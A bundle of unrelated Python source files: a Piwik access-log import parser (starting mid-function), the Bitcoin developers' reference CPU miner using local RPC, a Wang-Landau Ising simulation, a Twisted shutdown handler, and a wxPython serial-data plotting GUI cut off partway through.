pass
if not format:
fatal_error("cannot automatically determine the log format using the first %d lines of the log file. " % limit +
"\nMaybe try specifying the format with the --log-format-name command line argument." )
return
logging.debug('Format %s is the best match', format.name)
return format
def parse(self, filename):
"""
Parse the specified filename and insert hits in the queue.
"""
def invalid_line(line, reason):
stats.count_lines_invalid.increment()
if config.options.debug >= 2:
logging.debug('Invalid line detected (%s): %s' % (reason, line))
if filename == '-':
filename = '(stdin)'
file = sys.stdin
else:
if not os.path.exists(filename):
print >> sys.stderr, "\n=====> Warning: File %s does not exist <=====" % filename
return
else:
if filename.endswith('.bz2'):
open_func = bz2.BZ2File
elif filename.endswith('.gz'):
open_func = gzip.open
else:
open_func = open
file = open_func(filename, 'r')
if config.options.show_progress:
print 'Parsing log %s...' % filename
if config.format:
# The format was explicitely specified.
format = config.format
if isinstance(format, W3cExtendedFormat):
format.create_regex(file)
if format.regex is None:
return fatal_error(
"File is not in the correct format, is there a '#Fields:' line? "
"If not, use the --w3c-fields option."
)
else:
# If the file is empty, don't bother.
data = file.read(100)
if len(data.strip()) == 0:
return
try:
file.seek(0)
except IOError:
pass
format = self.detect_format(file)
if format is None:
return fatal_error(
'Cannot guess the logs format. Please give one using '
'either the --log-format-name or --log-format-regex option'
)
# Make sure the format is compatible with the resolver.
resolver.check_format(format)
if config.options.dump_log_regex:
logging.info("Using format '%s'." % format.name)
if format.regex:
logging.info("Regex being used: %s" % format.regex.pattern)
else:
logging.info("Format %s does not use a regex to parse log lines." % format.name)
logging.info("--dump-log-regex option used, aborting log import.")
os._exit(0)
hits = []
for lineno, line in enumerate(file):
try:
line = line.decode(config.options.encoding)
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
stats.count_lines_parsed.increment()
if stats.count_lines_parsed.value <= config.options.skip:
continue
match = format.match(line)
if not match:
invalid_line(line, 'line did not match')
continue
hit = Hit(
filename=filename,
lineno=lineno,
status=format.get('status'),
full_path=format.get('path'),
is_download=False,
is_robot=False,
is_error=False,
is_redirect=False,
args={},
)
if config.options.regex_group_to_page_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_page_cvars_map, True)
if config.options.regex_group_to_visit_cvars_map:
self._add_custom_vars_from_regex_groups(hit, format, config.options.regex_group_to_visit_cvars_map, False)
if config.options.regex_groups_to_ignore:
format.remove_ignored_groups(config.options.regex_groups_to_ignore)
try:
hit.query_string = format.get('query_string')
hit.path = hit.full_path
except BaseFormatException:
hit.path, _, hit.query_string = hit.full_path.partition(config.options.query_string_delimiter)
# W3cExtendedFormat detaults to - when there is no query string, but we want empty string
if hit.query_string == '-':
hit.query_string = ''
hit.extension = hit.path.rsplit('.')[-1].lower()
try:
hit.referrer = format.get('referrer')
if hit.referrer.startswith('"'):
hit.referrer = hit.referrer[1:-1]
except BaseFormatException:
hit.referrer = ''
if hit.referrer == '-':
hit.referrer = ''
try:
hit.user_agent = format.get('user_agent')
# in case a format parser included enclosing quotes, remove them so they are not
# sent to Piwik
if hit.user_agent.startswith('"'):
hit.user_agent = hit.user_agent[1:-1]
except BaseFormatException:
hit.user_agent = ''
hit.ip = format.get('ip')
try:
hit.length = int(format.get('length'))
except (ValueError, BaseFormatException):
# Some lines or formats don't have a length (e.g. 304 redirects, W3C logs)
hit.length = 0
try:
hit.generation_time_milli = float(format.get('generation_time_milli'))
except BaseFormatException:
try:
hit.generation_time_milli = float(format.get('generation_time_micro')) / 1000
except BaseFormatException:
try:
hit.generation_time_milli = float(format.get('generation_time_secs')) * 1000
except BaseFormatException:
hit.generation_time_milli = 0
if config.options.log_hostname:
hit.host = config.options.log_hostname
else:
try:
hit.host = format.get('host').lower().strip('.')
if hit.host.startswith('"'):
hit.host = hit.host[1:-1]
except BaseFormatException:
# Some formats have no host.
pass
# Add userid
try:
hit.userid = None
userid = format.get('userid')
if userid != '-':
hit.args['uid'] = hit.userid = userid
except:
pass
# add event info
try:
hit.event_category = hit.event_action = hit.event_name = None
hit.event_category = format.get('event_category')
hit.event_action = format.get('event_action')
hit.event_name = format.get('event_name')
if hit.event_name == '-':
hit.event_name = None
except:
pass
# Check if the hit must be excluded.
if not all((method(hit) for method in self.check_methods)):
continue
# Parse date.
# We parse it after calling check_methods as it's quite CPU hungry, and
# we want to avoid that cost for excluded hits.
date_string = format.get('date')
try:
hit.date = datetime.datetime.strptime(date_string, format.date_format)
except ValueError:
invalid_line(line, 'invalid date')
continue
# Parse timezone and substract its value from the date
try:
timezone = float(format.get('timezone'))
except BaseFormatException:
timezone = 0
except ValueError:
invalid_line(line, 'invalid timezone')
continue
if timezone:
hit.date -= datetime.timedelta(hours=timezone/100)
if config.options.replay_tracking:
# we need a query string and we only consider requests with piwik.php
if not hit.query_string or not hit.path.lower().endswith(config.options.replay_tracking_expected_tracker_file):
invalid_line(line, 'no query string, or ' + hit.path.lower() + ' does not end with piwik.php')
continue
query_arguments = urlparse.parse_qs(hit.query_string)
if not "idsite" in query_arguments:
invalid_line(line, 'missing idsite')
continue
try:
hit.args.update((k, v.pop().encode('raw_unicode_escape').decode(config.options.encoding)) for k, v in query_arguments.iteritems())
except UnicodeDecodeError:
invalid_line(line, 'invalid encoding')
continue
hits.append(hit)
if len(hits) >= config.options.recorder_max_payload_size * len(Recorder.recorders):
Recorder.add_hits(hits)
hits = []
# add last chunk of hits
if len(hits) > 0:
Recorder.add_hits(hits)
def _add_custom_vars_from_regex_groups(self, hit, format, groups, is_page_var):
for group_name, custom_var_name in groups.iteritems():
if group_name in format.get_all():
value = format.get(group_name)
# don't track the '-' empty placeholder value
if value == '-':
continue
if is_page_var:
hit.add_page_custom_var(custom_var_name, value)
else:
hit.add_visit_custom_var(custom_var_name, value)
def main():
"""
Start the importing process.
"""
stats.set_time_start()
if config.options.show_progress:
stats.start_monitor()
recorders = Recorder.launch(config.options.recorders)
try:
for filename in config.filenames:
parser.parse(filename)
Recorder.wait_empty()
except KeyboardInterrupt:
pass
stats.set_time_stop()
if config.options.show_progress:
stats.stop_monitor()
stats.print_summary()
def fatal_error(error, filename=None, lineno=None):
print >> sys.stderr, 'Fatal error: %s' % error
if filename and lineno is not None:
print >> sys.stderr, (
'You can restart the import of "%s" from the point it failed by '
'specifying --skip=%d on the command line.\n' % (filename, lineno)
)
os._exit(1)
if __name__ == '__main__':
try:
piwik = Piwik()
config = Configuration()
stats = Statistics()
resolver = config.get_resolver()
parser = Parser()
main()
sys.exit(0)
except KeyboardInterrupt:
pass
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 2322
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
functions0.py
|
#The MIT License (MIT)
#
#Copyright (c) 2017 Jordan Connor
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
import pandas
import numpy as np
from bokeh.io import show
from bokeh.plotting import figure
from project import lattice
from collections import Counter,defaultdict
from multiprocessing import Process, Pipe
from datetime import datetime
from math import *
QUIT = "QUIT"
class sim_helper(object):
def __init__(self,L,fN,u):
self.L = L
self.u = u
# Set our initial state
self.E1 = None
while self.E1 is None or (self.E1 < self.u[0] or self.E1 >= self.u[1]):
self.lat = lattice.isinglattice(L)
self.E1 = self.lat.E()
#Set the initial f paramater
self.f = np.e
#Define our histogram counter
self.H = Counter()
#Define our density of states and initialize to our guess
self.g0 = np.log(1)
#Define our modification paramater
self.fN = fN
self.G = {self.E1 : self.g0}
def sweep(self):
for i in range(self.L**2):
#Do the trial flip and calculate the new energy
E2 = None
x = None
y = None
x,y = np.random.randint(0,self.L,2)
#self.lat.flip(x,y)
#E2 = self.lat.E()
E2 = self.E1 + self.lat.dU(x, y)
if not (E2 < self.u[0] or E2 >= self.u[1]):
#self.lat.flip(x, y)
#else:
#Accept the energy if it meets the wang landau criterion
#or reverse the flip
if E2 not in self.G.keys():
self.G[E2] = self.g0
if(np.random.uniform() <= np.exp(float(self.G[self.E1])-self.G[E2])):
self.E1 = E2
self.lat.flip(x, y)
#else:
#self.lat.flip(x,y)
#update our DOS for the current energy
self.G[self.E1] += np.log(self.f)
#Add our new energy to the histogram
self.H[self.E1] += 1
def clear(self,f):
self.f = f
self.H.clear()
def sim_process(conn):
L,fN,u = conn.recv()
helper = sim_helper(L,fN,u)
while(conn.recv() != "EOF"):
for i in range(10000):
helper.sweep()
conn.send(helper.G)
conn.send(helper.H)
newF = conn.recv()
if(newF != helper.f):
helper.clear(newF)
conn.close()
class wanglandauising(object):
def __init__(self,L,p,fN):
self.L = L
self.p = p
#Define our normalized DOS
self.GN = {}
#Define an nonnormalized DOS
self.G = {}
#Define our modification factors
self.f = np.e
self.fN = fN
self.H = Counter()
self.pCount = 2
self.processes = []
self.conns = []
A = 2*L**2+.06
#self.ranges = [[-A,-A/2.0],[-A/2.0,0],[0,A/2.0],[A/2.0,A]]
#print(self.ranges)
self.ranges = [[-100,0],[0,100]]
#self.ranges=[[-1000,1000]]
def run(self):
for i in range(self.pCount):
parent_conn, child_conn = Pipe()
self.processes.append(Process(target=sim_process, args=(child_conn,)))
self.conns.append(parent_conn)
self.processes[i].start()
self.conns[i].send([self.L,self.fN,self.ranges[i]])
while not self.f < np.exp(10**-8):
for i in range(self.pCount):
self.conns[i].send("GO")
for conn in self.conns:
for e,g in conn.recv().iteritems():
self.G[e] = g
self.H += conn.recv()
self.check_flatness()
for i in range(self.pCount):
self.conns[i].send("EOF")
self.conns[i].close()
self.processes[i].join()
#Normalize our DOS
for e,g in self.G.iteritems():
self.GN[e] = g - self.G[-2] + np.log(2)
#print(self.GN)
def check_flatness(self,a=":)"):
#Determine the average histogram
avgH = 0.0
size = 0.0
for e,count in self.H.iteritems():
avgH += count
size += 1.0
avgH = avgH/size
#Now finish our average and determine our percetnage
avgH = avgH*self.p
#Now verify the wanglandau criterion is satisfied
cSat = True
for e,count in self.H.iteritems():
if count <= avgH:
print(str(count) + " " + str(avgH))
cSat = False
break
#If satisfied we reduce our modification factor
if cSat:
self.f = self.f**(1/float(self.fN))
self.H.clear()
for conn in self.conns:
conn.send(self.f)
print(self.f)
def u(self,T):
num = 0.0
den = 0.0
for e,g in self.G.iteritems():
num += (e*g*np.exp(-float(e)/T))
den += (g*np.exp(-float(e)/T))
return (num/den)/self.L
if __name__ == '__main__':
#Run the simulation
L = 4
sim = wanglandauising(L,.8,2)
t1 = datetime.now()
sim.run()
t2 = datetime.now()
delta = t2-t1
print(delta.microseconds)
#Now use the DOS to generate our energies for various values of t
U = []
G = []
for e,g in sim.GN.iteritems():
U.append(e)
G.append(g)
s1 = figure(width=500, plot_height=500,title="DOS for" + str(L) +" x "+str(L)+ "Ising Model")
s1.circle(U,G,size=5,color="navy",alpha=.5)
s1.xaxis.axis_label = "Energy per Lattice Site"
s1.yaxis.axis_label = "ln(g(e))"
show(s1)
|
shutdown.py
|
import signal
from .Device import listOfDevices
from twisted.internet import reactor
from threading import Thread
import time
def GracefullShutdown(sig, form):
for device in listOfDevices:
device.stop()
t = Thread(target=server_shutdown)
t.start()
def server_shutdown():
time.sleep(0.3)
reactor.stop()
def SetShutdownHandler():
signal.signal(signal.SIGINT, GracefullShutdown)
signal.signal(signal.SIGTERM, GracefullShutdown)
|
Gui.py
|
from threading import Thread, Lock, Event
import time
import serial
import sys
import wx
import sys
import glob
import os
import struct
from csv import writer
import numpy as np
from collections import deque
import serial.tools.list_ports
import numpy as np
import matplotlib as mtp
mtp.use('WxAgg')
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg
from matplotlib.figure import Figure
import matplotlib.animation as manim
from datetime import datetime
look= Lock()
# Global Parametes
stop_threads = False
stop_threads_1 = False
flag_data=False
flag_save= False
analog =0
dato1=0
event = Event()
# ser = serial.Serial()
data_serial = [b'', b'', b'',b'']
# Class for serial Comunication
class Serial_com:
def __init__(self, port, baud):
self.running = 1
self.analog =0
self.dato1=0
self.ser= serial.Serial(port,baud,\
parity=serial.PARITY_NONE,\
stopbits=serial.STOPBITS_ONE,\
bytesize=serial.EIGHTBITS,\
timeout=(0.5))
self.SOH = b'H'
self.STX = b'T'
self.ETX = b'E'
self.flag_data= False
# Thread for reading serial Port
self.t1 = Thread(target = self.loop)
self.t1.start()
self.t2 = Thread(target = self.update)
self.t2.start()
def loop (self):
c=['','','','']
global data_serial
while True:
global stop_threads, data_serial, flag_data, event
if stop_threads:
break
# stop_threads_1= True
# Waiting for serial buffer
if self.ser.inWaiting() > 0:
# a=ser.read_until(ETX,8)
a = self.ser.readline(1)
# Define the start of protocol
if a == self.SOH:
# Read the rest of the protocol
b = self.ser.readline(5)
# if its correct the number of bytes separate data received
if len(b) ==5:
c= struct.unpack('sshs',b)
# use look for blocking changes from other threads
look.acquire()
data_serial =c
if(data_serial[0]==b'R'):
data.save(data_serial[2],0)
# data.axis_data1 = data_serial[2]
# print (data.axis_data1)
if(data_serial[0]==b'B'):
data.save(data_serial[2],1)
look.release()
# flag_data = True
# event.set()
self.ser.close()
def update (self):
i = 0
while True:
global flag_data, event
if stop_threads:
break
if event.is_set():
# print(data.tim)
# print("%d %d",data.axis_data1[-1], data.axis_data2[-1])
frame.value_data1.SetLabel(str(data.axis_data1[-1]))
frame.value_data2.SetLabel(str(data.axis_data2[-1]))
# frame.Refresh()
global flag_save
if(flag_save):
# print('guardar')
data_save=[data.tim ,str(frame.baud_selec),str(data.axis_data1[-1]),str(data.axis_data2[-1])]
print(data_save)
# frame.text_msg.SetLabel('Data 1: '+str(data1) +' Data2: '+str(data2))
append_list_as_row(frame.path_dir,frame.data_rec, data_save)
event.clear()
# look.release()
# flag_data= False
# Lists serial port names
# A list of the serial ports available on the system
def serial_ports():
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
# Function for save data in CSV file
def append_list_as_row(path,file_name, list_of_elem):
# Open file in append mode
f='csv/'+"\\"+file_name+'.csv'
with open(f, 'a', newline='') as write_obj:
# Create a writer object from csv module
csv_writer = writer(write_obj)
# Add contents of list as last row in the csv file
csv_writer.writerow(list_of_elem)
# Class of GUI
class Screen(wx.Frame):
def __init__(self, parent, title):
super(Screen, self).__init__(parent, title=title)
# wx.Frame.__init__(self, None, -1, name='Name')
# self.Bind(wx.EVT_CLOSE, self.OnClose)
self.port_selec=''
self.baud_selec='115200'
self.choices=[]
self.y_max = 100
self.y_min = 0
self.path_dir = 'C:'
self.data_rec=''
# panel = self
panel = wx.Panel(self, size=(1000,600))
# panel.SetBackgroundColour('#364958')
# panel.SetBackgroundColour('#5B5F97')
panel.SetBackgroundColour('#C0C0C0')
sizer = wx.GridBagSizer(5, 10)
# --------------------------------BOX SERIAL SETTINGS-----------------------------------------------------------
b1 = wx.StaticBox(panel, label="Serial Settings")
b1.SetBackgroundColour('#F1F7EE')
box_serial = wx.StaticBoxSizer(b1, wx.HORIZONTAL)
# BOX TEXT AND PORT OPTIONS
text_port=wx.StaticText(panel, label="Port")
text_port.SetBackgroundColour('#F1F7EE')
box_serial.Add(text_port, flag=wx.LEFT|wx.TOP, border=15)
self.port = wx.ComboBox(panel,value='Choose a port',choices=self.choices)
self.port.Bind(wx.EVT_COMBOBOX_DROPDOWN, self.List_port)
self.port.Bind(wx.EVT_TEXT, self.write_port)
self.port.Bind(wx.EVT_COMBOBOX, self.selec_port)
box_serial.Add(self.port,flag=wx.LEFT|wx.TOP, border=15)
# BOX TEXT AND BAUDRATE OPTIONS
text_baud=wx.StaticText(panel, label="Baudrate")
text_baud.SetBackgroundColour('#F1F7EE')
box_serial.Add(text_baud,flag=wx.LEFT|wx.TOP, border=15)
self.baud =wx.ComboBox(panel,value='115200',choices=['2400','4800','9600','19200','38400','57600','74880'
,'115200','230400', '460800'])
self.baud.Bind(wx.EVT_COMBOBOX, self.selec_baud)
box_serial.Add(self.baud,flag=wx.LEFT|wx.TOP, border=15)
self.connect_button = wx.Button(panel, label='Connect')
self.connect_button.Bind(wx.EVT_BUTTON, self.onConnect)
box_serial.Add(self.connect_button,flag=wx.LEFT|wx.TOP, border=15)
sizer.Add(box_serial, pos=(0, 0), span=(1, 4),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
# --------------------------------------------------------------------------------------------
b3 = wx.StaticBox(panel, label="Real Time Graph")
b3.SetBackgroundColour('#87BBA2')
self.box_plot = wx.StaticBoxSizer(b3, wx.VERTICAL)
self.fig = Figure(figsize=([5.3,4]),tight_layout = {'pad': 2})
self.a = self.fig.add_subplot(111)
# self.lineplot, = self.a.plot([],'ro-', label="Data1",markersize=1, linewidth=1)
# self.lineplot, = self.a.plot([],[],"bo-",label="Data1",markersize=0.5)
# self.lineplot1, = self.a.plot([],[],"ro-",label="Data1",markersize=0.5)
# self.a.legend(loc=1)
# self.a.minorticks_on()
# self.a.grid(which='major', linestyle='-', linewidth='0.5', color='black')
# self.a.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
# Function for realtime plot
self.canvas = FigureCanvasWxAgg(panel, wx.ID_ANY, self.fig)
# self.data_plot = RealtimePlot(axes,self.canvas,fig)
self.box_plot.Add(self.canvas, flag=wx.LEFT|wx.TOP|wx.RIGHT|wx.BOTTOM|wx.EXPAND, border=5)
# sizer.Add(self.canvas,pos=(1, 1), span=(10, 4),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
sizer.Add(self.box_plot, pos=(1, 0), span=(3, 5),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
self._plot = RealtimePlot(self.a, self.canvas, self.fig)
# ----------------------BOX RECORD SETTINGS---------------------------------------------------
b2 = wx.StaticBox(panel, label="Record / Export")
b2.SetBackgroundColour('#F1F7EE')
self.box_rec = wx.StaticBoxSizer(b2, wx.HORIZONTAL)
# BUTTON BROWSER
self.text_port=wx.StaticText(panel, label="Path")
self.text_port.SetBackgroundColour('#F1F7EE')
self.box_rec.Add(self.text_port, flag=wx.LEFT|wx.TOP, border=15)
# self.path = wx.TextCtrl(panel,value=os.path.abspath(os.getcwd())+'\csv',size=wx.Size(200,15))
# self.box_rec.Add(self.path, flag=wx.LEFT|wx.TOP|wx.EXPAND,border=15)
# self.browser_button= wx.Button(panel,label="Browser")
# self.browser_button.Bind(wx.EVT_BUTTON, self.onDir)
# self.box_rec.Add(self.browser_button, flag=wx.LEFT|wx.TOP, border=15)
# BUTTON REC
self.rec_button= wx.Button(panel,label="REC",)
self.rec_button.Bind(wx.EVT_BUTTON, self.onRec)
self.box_rec.Add(self.rec_button, flag=wx.LEFT|wx.TOP, border=15)
sizer.Add(self.box_rec, pos=(0, 4), span=(1, 4),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
line = wx.StaticLine(panel)
# -------------------- CURRENT SETTINGS -----------------------------------------------------
b4 = wx.StaticBox(panel,label="Current Value")
b4.SetBackgroundColour('#87BBA2')
# b4.SetBackgroundColour('#143642')
self.box_data = wx.StaticBoxSizer(b4, wx.VERTICAL)
text_data1=wx.StaticText(panel, label="Analogue Data 1")
text_data1.SetBackgroundColour('#364958')
text_data1.SetForegroundColour('#F1F7EE')
text_data1.SetFont(wx.Font(18, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(text_data1, flag=wx.LEFT|wx.TOP, border=15)
self.value_data1=wx.StaticText(panel, label="00")
self.value_data1.SetBackgroundColour('#F1F7EE')
self.value_data1.SetFont(wx.Font(40, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(self.value_data1, flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER , border=15)
text_data1=wx.StaticText(panel, label="Analogue Data 2")
text_data1.SetBackgroundColour('#364958')
text_data1.SetForegroundColour('#F1F7EE')
text_data1.SetFont(wx.Font(18, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(text_data1, flag=wx.LEFT|wx.TOP, border=15)
self.value_data2=wx.StaticText(panel, label="00")
self.value_data2.SetBackgroundColour('#F1F7EE')
self.value_data2.SetFont(wx.Font(40, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_data.Add(self.value_data2, flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=15)
sizer.Add(self.box_data, pos=(1,5), span=(2, 3),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=10)
# -------------------- GRAPH SETTINGS -----------------------------------------------------
b5 = wx.StaticBox(panel,label="Graph Settings")
b5.SetBackgroundColour('#F1F7EE')
text_max=wx.StaticText(panel, label="Y-Limit Max")
text_max.SetBackgroundColour('#F1F7EE')
text_max.SetFont(wx.Font(10, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.Limit_max = wx.SpinCtrl(panel, value="100" , min=0, max=100, initial=100)
# self.Limit_max = wx.TextCtrl(panel,value='100', size=wx.Size(40,20))
# self.Limit_max.Bind(wx.EVT_TEXT, self.Set_Limit)
text_min=wx.StaticText(panel, label="Y-Limit Max")
text_min.SetBackgroundColour('#F1F7EE')
text_min.SetFont(wx.Font(10, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.Limit_min = wx.SpinCtrl(panel, value="0" , min=0, max=100, initial=0)
# self.Limit_min = wx.TextCtrl(panel,value='0', size=wx.Size(40,20))
# self.Limit_min.Bind(wx.EVT_TEXT,self.Set_Limit)
self.box_princ= wx.StaticBoxSizer(b5,wx.VERTICAL)
self.box_param = wx.BoxSizer(wx.HORIZONTAL)
self.box_min = wx.BoxSizer( wx.HORIZONTAL)
self.box_param.Add(text_max, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_param.Add(self.Limit_max, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_min.Add(text_min, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_min.Add(self.Limit_min, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)
self.box_princ.Add(self.box_param,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=5)
self.box_princ.Add(self.box_min,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=5)
self.set_button= wx.Button(panel,label="SET")
self.set_button.Bind(wx.EVT_BUTTON, self.Set_Limit)
self.box_princ.Add(self.set_button,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=5)
sizer.Add(self.box_princ, pos=(3,5), span=(1, 3),flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT|wx.BOTTOM , border=10)
# -------------------- MESSAGE SETTINGS -----------------------------------------------------
b6 = wx.StaticBox(panel,label="Messages")
b6.SetBackgroundColour('#F1F7EE')
self.box_msg = wx.StaticBoxSizer(b6, wx.HORIZONTAL)
text_1 = wx.StaticText(panel, label="Serial Comunication: ")
text_1.SetBackgroundColour('#F1F7EE')
text_1.SetFont(wx.Font(12, wx.DECORATIVE, wx.NORMAL, wx.NORMAL))
self.box_msg.Add(text_1,flag=wx.LEFT|wx.TOP|wx.ALIGN_CENTER, border=1)
